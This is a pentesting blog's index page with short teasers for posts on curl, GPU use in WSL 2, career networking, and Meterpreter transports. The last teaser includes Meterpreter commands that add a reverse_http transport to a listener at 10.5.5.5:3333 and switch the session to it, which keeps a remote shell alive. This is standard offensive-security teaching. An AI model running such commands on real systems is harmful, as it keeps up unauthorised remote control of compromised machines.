Blog
cURL for Pentesters: Part 1 – Master the Fundamentals
If you're new to penetration testing, curl might seem like just another command line tool in an already overwhelming toolkit. But here's the thing: curl is likely the most universally available HTTP client you'll encounter. Whether you've just compromised a Linux...
How to Use NVIDIA Graphics Cards in WSL 2
Stop leaving GPU performance on the table! Follow this guide to enable NVIDIA support in WSL 2 and supercharge your pentesting workloads.
How to Network for a CyberSecurity Job
The Do’s and Don’ts to succeed in networking. While these tips work for everyone, they especially help introverts succeed in an extrovert’s game.
How To Save A Shell with Meterpreter Transports
The transport next command will force the Meterpreter session to switch to the next configured transport.
meterpreter> transport add -t reverse_http -l 10.5.5.5 -p 3333
meterpreter> transport next